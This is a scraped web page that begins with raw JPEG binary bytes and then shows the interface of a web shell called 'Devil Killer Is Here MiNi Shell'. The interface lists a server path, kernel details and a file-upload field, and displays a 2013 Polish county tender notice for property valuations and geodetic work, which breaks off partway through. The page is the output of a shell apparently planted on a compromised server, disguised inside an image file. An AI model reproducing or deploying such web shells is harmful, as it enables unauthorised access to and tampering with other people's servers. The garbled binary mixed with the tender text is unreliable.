JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130904/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130904/177213-N-2013.html

<p class="kh_header"><b>Nowy Sącz: ZP.272.20.2013 Zamówienie na sporządzenie dokumentacji
związanej z gospodarowaniem nieruchomościami Skarbu Państwa i
Powiatu Nowosądeckiego (operaty szacunkowe, dokumentacja
geodezyjna)</b><br>
<b>Numer ogłoszenia: 177213 - 2013; data zamieszczenia: 04.09.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat Nowosądecki, Zarząd Powiatu Nowosądeckiego , ul. Jagiellońska 33, 33-300 Nowy Sącz, woj. małopolskie, tel. 18 4141600, faks 18 4141700.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.starostwo.nowy-sacz.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> ZP.272.20.2013 Zamówienie na sporządzenie dokumentacji
związanej z gospodarowaniem nieruchomościami Skarbu Państwa i
Powiatu Nowosądeckiego (operaty szacunkowe, dokumentacja
geodezyjna).</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Usługi sporządzenia dokumentacji związanej z gospodarowaniem nieruchomościami Skarbu Państwa i Powiatu Nowosądeckiego (operaty szacunkowe, dokumentacja geodezyjna):
- określenie wzrostu wartości nieruchomości;
- sporządzenie operatów szacunkowych;
- sporządzenie kopii mapy ewidencyjnej;
- analiza stanu prawnego nieruchomości;
- uzupełnienie wykazu nieruchomości;
- geodezyjny podział nieruchomości.

Cena za wykonanie usługi obejmuje również udział w postępowaniu administracyjnym i sądowym w sprawach dotyczących wykonanego opracowania, w tym w rozprawach przed urzędami oraz sądami powszechnymi. 


Postępowanie zostało podzielone na dziewiętnaście wyszczególnionych poniżej części. Wykonawca może złożyć ofertę na wszystkie części lub dowolnie przez siebie wybrane.

Część	
Zakres prac

1.	Określenie wzrostu wartości nieruchomości położonej w obr.77 m. Nowego Sącza przy ul. Strzeleckiej 1, oznaczonej jako działka ewid. nr 59/4 o pow. 0,0756 ha, stanowiącej współwłasność Powiatu Nowosądeckiego i Miasta Nowego Sącza zabudowanej budynkiem administracyjnym, obj. księgą wieczystą KW Nr NS1S/00083551/5, w związku z wykonaną rozbudową  i remontem na podstawie pozwolenia na budowę - Decyzja Nr 240/04 z dnia 29 czerwca 2004r., znak: WAB.7353/A/208/04.
Podać cenę brutto:
Termin wykonania:1 miesiąc od dnia zawarcia umowy. 
2.	Sporządzenie operatu szacunkowego określającego wartość nieruchomości położonych na terenie miasta Nowego Sącza i Powiatu Nowosądeckiego - dla potrzeb ustalenia wysokości odszkodowania należnego byłym właścicielom nieruchomości przejętych w trybie art.12 ust.4 pkt 2 ustawy z dnia 10.04.2003r. O szczególnych zasadach przygotowania i realizacji inwestycji  w zakresie dróg publicznych. 
Dla każdej nieruchomości należy sporządzić oddzielny operat.
Jeden operat może obejmować więcej niż 1 działkę objętą tą samą księgą wieczystą.
Podać cenę brutto.
Maksymalna liczba planowanych operatów - 53, minimalna - 34.
Termin wykonania zamówienia - 3 tygodnie licząc od dnia doręczenia wykonawcy zlecenia. Zlecenia zostaną dostarczone nie później niż do dnia 12.11.2013r.
3.	Sporządzenie operatu szacunkowego określającego wartość niezabudowanej nieruchomości, stanowiącej własność Gminy Krynica, położonej w obr. Krynica-Zdrój m. Krynica-Zdrój, oznaczonej jako działka ewid. nr 1620/2 o pow.0,0171ha (poprzednio działka poscaleniowa 397 w gm. kat. Krynica-Zdrój), wg. stanu na datę wywłaszczenia i zwrotu - w celu rozliczenia odszkodowania z tytułu zwrotu wywłaszczonej nieruchomości. Odszkodowanie z tytułu wywłaszczenia obejmowało grunt i drzewostan.
Podać cenę brutto.
Termin wykonania:1 miesiąc od dnia zawarcia umowy. 
4.	Sporządzenie operatu szacunkowego określającego wartość rynkową nieruchomości gruntowej, oznaczonej jako działka ewid. nr 409/5 o  pow.0,12ha, położona w Mochnaczce Wyżnej gm. Krynica-Zdrój, stanowiąca własność Skarbu Państwa w użytkowaniu wieczystym  - dla potrzeb aktualizacji opłaty rocznej z tytułu użytkowania wieczystego.
Podać cenę brutto.
Termin wykonania: 1 miesiąc od dnia zawarcia umowy. 
5.	Sporządzenie operatu szacunkowego określającego wartość rynkową nieruchomości gruntowej, oznaczonej jako działka ewid. nr 235/2 o  pow.0,0843ha, położona w obr. Krynica-Wieś m. Krynica-Zdrój, stanowiąca własność Skarbu Państwa w użytkowaniu wieczystym  - dla potrzeb aktualizacji opłaty rocznej z tytułu użytkowania wieczystego.
Podać cenę brutto.
Termin wykonania: 1 miesiąc od dnia zawarcia umowy. 
6.	Sporządzenie kopii mapy ewidencyjnej z wykazem zmian gruntowych dla działki ewidencyjnej Skarbu Państwa nr 373/13 o pow. 5,20 ha położonej w obrębie ewidencyjnym Popardowa gm. Nawojowa - w części oznaczonej na załączniku graficznym obejmującej teren położony poza korytem cieku wodnego -  wraz ze skompletowaniem dokumentacji będącej podstawą założenia księgi wieczystej dla w/w nieruchomości - dla potrzeb regulacji stanu prawnego nieruchomości
Opracowanie należy sporządzić  w 3 egzemplarzach oraz  w wersji cyfrowej.
Podać cenę brutto:
Termin wykonania:1 miesiąc od dnia zawarcia umowy. 
7. 	Sporządzenie kopii mapy ewidencyjnej z wykazem zmian gruntowych dla działki ewidencyjnej nr 298/4, położonej w Obr. Nawojowa, tylko w części dotyczącej pgr 2018, z zaznaczeniem jej przebiegu na wyrysie z mapy ewidencyjnej.
Opracowanie należy sporządzić  w 3 egzemplarzach oraz  w wersji cyfrowej.
Podać cenę brutto.
Termin wykonania: 1 miesiąc od dnia zawarcia umowy.
8.	Analiza stanu prawnego nieruchomości Skarbu Państwa obj. Kw NS1S/00002134/5- Marcinkowice gm. Chełmiec, z wykonaniem wykazu zmian gruntowych oraz kopii map ewidencyjnych połączonych ze skompletowaniem dokumentacji będącej podstawą zmiany oznaczenia w księdze wieczystej dla w/w nieruchomości.
 Księga obejmuje 3 parcele o łącznej powierzchni 0,3195  ha
Opracowanie należy sporządzić  w 3 egzemplarzach oraz  w wersji cyfrowej.
Podać cenę brutto.
Termin wykonania: 1 miesiąc od dnia zawarcia umowy.
9.	Analiza stanu prawnego nieruchomości Skarbu Państwa obj. Kw NS1G/00022506/9 - Stróże gm. Grybów, z wykonaniem wykazu zmian gruntowych oraz kopii map ewidencyjnych połączonych  ze skompletowaniem dokumentacji będącej podstawą zmiany oznaczenia w księdze wieczystej dla w/w nieruchomości, oraz sporządzenie kopii mapy ewidencyjnej z wykazem zmian gruntowych dla działek ewidencyjnych objętych pozycją rejestrową nr 13 operatu ewidencji gruntów dla obr. Stróże gm. Grybów wraz ze skompletowaniem dokumentacji będącej podstawą założenia księgi wieczystej dla w/w nieruchomości.
Księga obejmuje 7 parcel (działek) o łącznej powierzchni 3,6055 ha
W rejestrze uwidocznionych jest 7 działek ewidencyjnych o łącznej powierzchni 0,7020 ha
Opracowanie należy sporządzić  w 3 egzemplarzach oraz w wersji cyfrowej.
Podać cenę brutto.
Termin wykonania: 1 miesiąc od dnia zawarcia umowy.
10.	Sporządzenie kopii mapy ewidencyjnej z wykazem zmian gruntowych dla działek ewidencyjnych w skład których wchodzą pgr nr 1374/50, 1374/51, 1374/16, 1377, 1374/6 objęte Lwh 364- gm. kat. Bartkowa, wraz ze skompletowaniem dokumentacji będącej podstawą założenia księgi wieczystej dla w/w nieruchomości.
Opracowanie należy sporządzić  w 3 egzemplarzach oraz  w wersji cyfrowej.
Podać cenę brutto.
Termin wykonania: 1 miesiąc od dnia zawarcia umowy.
11.	Sporządzenie kopii mapy ewidencyjnej z wykazem zmian gruntowych dla działek ewidencyjnych nr 460 i 523 o łącznej pow.0,1463 ha, położonych w obr. 1 miasta Grybowa, wraz ze skompletowaniem dokumentacji będącej podstawą założenia księgi wieczystej dla ww. nieruchomości.
Opracowanie należy sporządzić  w 3 egzemplarzach oraz  w wersji cyfrowej.
Podać cenę brutto.
Termin wykonania: 1 miesiąc od dnia zawarcia umowy.
12.	Sporządzenie kopii mapy ewidencyjnej z wykazem zmian gruntowych dla działki ewidencyjnej nr 168/1 o pow. 0,02 ha położonej w obrębie Florynka gm. Grybów, wraz ze skompletowaniem dokumentacji będącej podstawą założenia księgi wieczystej dla w/w nieruchomości.
Opracowanie należy sporządzić  w 3 egzemplarzach oraz  w wersji cyfrowej.
Podać cenę brutto.
Termin wykonania: 1 miesiąc od dnia zawarcia umowy.
13.	Uzupełnienie wykazu nieruchomości Skarbu Państwa dla celów realizacji ustawy z dnia 07 września 2007 r. o ujawnieniu w księgach wieczystych prawa własności nieruchomości Skarbu Państwa oraz jednostek samorządu terytorialnego dla 42 działek ewidencyjnych położonych w gminie Chełmiec w obrębach: Biczyce Dolne, Chełmiec, Dąbrowa, Kunów, Marcinkowice, Niskowa, Świniarsko, Wielopole o dane wieczysto - księgowe dla w/w działek zgodnie z tabelą prowadzoną przez Wydział Geodezji i Budownictwa. W przypadku rozbieżności w oznaczeniu działek pomiędzy stanem w ewidencji gruntów w Lwh/KW należy wykonać  kopię mapy ewidencyjnej z wykazem zmian gruntowych.
Opracowanie należy sporządzić  w 3 egzemplarzach oraz  w wersji cyfrowej.
Podać cenę brutto.
Termin wykonania: 30 październik 2013r.
14.	Uzupełnienie wykazu nieruchomości Skarbu Państwa dla celów realizacji ustawy z dnia 07 września 2007 r. o ujawnieniu w księgach wieczystych prawa własności nieruchomości Skarbu Państwa oraz jednostek samorządu terytorialnego dla 24 działek ewidencyjnych położonych w gminie Gródek nad Dunajcem w obrębach: Bartkowa Posadowa, Bujne, Jelna, Podole Górowa, Przydonica, Roztoka Brzeziny o dane wieczysto - księgowe dla w/w działek zgodnie z tabelą prowadzoną przez Wydział Geodezji i Budownictwa. W przypadku rozbieżności w oznaczeniu działek pomiędzy stanem w ewidencji gruntów w Lwh/KW należy wykonać  kopię mapy ewidencyjnej z wykazem zmian gruntowych.
Opracowanie należy sporządzić  w 3 egzemplarzach oraz  w wersji cyfrowej.
Podać cenę brutto.
Termin wykonania: 30 październik 2013r.
15.	Uzupełnienie wykazu nieruchomości Skarbu Państwa dla celów realizacji ustawy z dnia 07 września 2007 r. o ujawnieniu w księgach wieczystych prawa własności nieruchomości Skarbu Państwa oraz jednostek samorządu terytorialnego dla 42 działek ewidencyjnych położonych  w obrębie Biała Niżna gmina Grybów o dane wieczysto - księgowe dla w/w działek zgodnie z tabelą prowadzoną przez Wydział Geodezji i Budownictwa. W przypadku rozbieżności w oznaczeniu działek pomiędzy stanem w ewidencji gruntów w Lwh/KW należy wykonać  kopię mapy ewidencyjnej z wykazem zmian gruntowych.
Opracowanie należy sporządzić  w 3 egzemplarzach oraz  w wersji cyfrowej.
Podać cenę brutto.
Termin wykonania: 30 październik 2013r.
16.	Analiza stanu prawnego nieruchomości oraz sporządzenie kopii mapy ewidencyjnej z wykazem zmian gruntowych dla działek ewidencyjnych nr 229/1 i 229/2 o łącznej pow.  8,5589 ha położonych w obr. Frycowa  gm. Nawojowa - stanowiących pas drogowy drogi krajowej nr 75 Brzesko- Krynica. W przypadku posiadanych przez Wydział Geodezji i Budownictwa  prawomocnych decyzji wywłaszczeniowych należy sporządzić dokumentację będącą podstawą ujawnienia decyzji w księdze wieczystej. 
Opracowanie należy sporządzić  w 3 egzemplarzach oraz  w wersji cyfrowej.
Podać cenę brutto.
Termin wykonania: 30 październik 2013r.
17.	Analiza stanu prawnego nieruchomości oraz sporządzenie kopii mapy ewidencyjnej z wykazem zmian gruntowych dla działek ewidencyjnych nr 62 i 119 o łącznej pow.  7,62 ha położonych w obr. Maciejowa  gm. Łabowa - stanowiących pas drogowy drogi krajowej nr 75 Brzesko- Krynica. W przypadku posiadanych przez Wydział Geodezji i Budownictwa prawomocnych decyzji wywłaszczeniowych należy sporządzić dokumentację będącą podstawą ujawnienia decyzji w księdze wieczystej. 
Opracowanie należy sporządzić  w 3 egzemplarzach oraz  w wersji cyfrowej.
Podać cenę brutto.
Termin wykonania: 30 październik 2013r.
18.	Analiza stanu prawnego nieruchomości oraz sporządzenie kopii mapy ewidencyjnej z wykazem zmian gruntowych dla działek ewidencyjnych nr 201, 305 i 393 o łącznej pow.  10,23 ha położonych w obr. Łabowa  gm. Łabowa - stanowiących pas drogowy drogi krajowej nr 75 Brzesko- Krynica. W przypadku posiadanych przez Wydział Geodezji i Budownictwa prawomocnych decyzji wywłaszczeniowych należy sporządzić dokumentację będącą podstawą ujawnienia decyzji w księdze wieczystej. 
Opracowanie należy sporządzić  w 3 egzemplarzach oraz  w wersji cyfrowej.
Podać cenę brutto.
Termin wykonania: 30 październik 2013r.
19.	Geodezyjny podział  nieruchomości położonej w obr. 109 m. Nowego Sącza, oznaczonej jako działka nr 644, stanowiącej własność Miasta Nowy Sącz, mający na celu wydzielenie wywłaszczonej dz. nr 205/14 - do celów zwrotu wywłaszczonej nieruchomości.  
Podać cenę brutto.
Termin wykonania: 29 listopad 2013r.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 70.00.00.00-1, 70.10.00.00-2, 71.35.40.00-4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 19.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Z uwagi na wartość przedmiotu zamówienia Zamawiający nie wymaga
wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełniania tego warunku.
Wykonawca potwierdza spełnianie warunku poprzez złożenie oświadczenia w trybie art. 22 ust. 1
ustawy Prawo zamówień publicznych (oświadczenie to stanowi załącznik nr 3 do specyfikacji)</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełniania tego warunku.
Wykonawca potwierdza spełnianie warunku poprzez złożenie oświadczenia w trybie art. 22 ust. 1
ustawy Prawo zamówień publicznych (oświadczenie to stanowi załącznik nr 3 do specyfikacji)</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełniania tego warunku.
Wykonawca potwierdza spełnianie warunku poprzez złożenie oświadczenia w trybie art. 22 ust. 1
ustawy Prawo zamówień publicznych (oświadczenie to stanowi załącznik nr 3 do specyfikacji)</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W tym zakresie Zamawiający wymaga w szczególności aby: zamówienie na realizację części 1, 2, 3, 4 i 5 wykonywane było przez osoby posiadające uprawnienia zawodowe  w zakresie szacowania nieruchomości, zamówienie na realizację części 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18 i 19 wykonywane było przez osoby posiadające uprawnienia zawodowe w dziedzinie geodezji i kartografii.
Wykonawca potwierdza spełnianie warunku poprzez złożenie:
- oświadczenia w trybie art. 22 ust 1 ustawy Prawo zamówień publicznych (oświadczenie  to stanowi załącznik nr 3 do specyfikacji),
- oświadczenia, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień (wzór oświadczenia stanowi załącznik nr 5 do specyfikacji)</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełniania tego warunku.
Wykonawca potwierdza spełnianie warunku poprzez złożenie oświadczenia w trybie art. 22 ust. 1
ustawy Prawo zamówień publicznych (oświadczenie to stanowi załącznik nr 3 do specyfikacji)</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Do oferty powinien być dołączony dokument określający zasady reprezentacji oraz osoby uprawnione do
reprezentacji Wykonawcy, a jeżeli Wykonawcę reprezentuje pełnomocnik - także pełnomocnictwo,
określające zakres umocowania, podpisane przez osoby uprawnione do reprezentowania Wykonawcy</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zakazuje się istotnych zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której
dokonano wyboru Wykonawcy. Wyjątek stanowi sytuacja gdy konieczne będzie przedłużenie terminu
realizacji zamówienia z powodów niezawinionych przez Wykonawcę np. oczekiwania na wydanie
niezbędnych uzgodnień, postanowień lub decyzji innych organów (urzędów miast, urzędów gmin, sądów
powszechnych). Forma aneks do umowy. Warunek: zmiana będzie korzystna dla Zamawiającego</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.powiat.nowy-sacz.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe w
Nowym Sączu, Zespół ds. Zamówień Publicznych, pok. 320 ul. Jagiellońska 33, 33-300 Nowy Sącz.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.09.2013 godzina 10:00, miejsce: Starostwo Powiatowe w Nowym Sączu Kancelaria Administracyjna, pok. 113, ul.
Jagiellońska 33, 33-300 Nowy Sącz.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> CZĘŚĆ 1.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Określenie wzrostu wartości nieruchomości położonej w obr.77 m. Nowego Sącza przy ul. Strzeleckiej 1, oznaczonej jako działka ewid. nr 59/4 o pow. 0,0756 ha, stanowiącej współwłasność Powiatu Nowosądeckiego i Miasta Nowego Sącza zabudowanej budynkiem administracyjnym, obj. księgą wieczystą KW Nr NS1S/00083551/5, w związku z wykonaną rozbudową  i remontem na podstawie pozwolenia na budowę - Decyzja Nr 240/04 z dnia 29 czerwca 2004r., znak: WAB.7353/A/208/04.
Podać cenę brutto:
Termin wykonania:1 miesiąc od dnia zawarcia umowy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 70.00.00.00-1, 70.10.00.00-2, 71.35.40.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 1.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> CZĘŚĆ 2.</p>
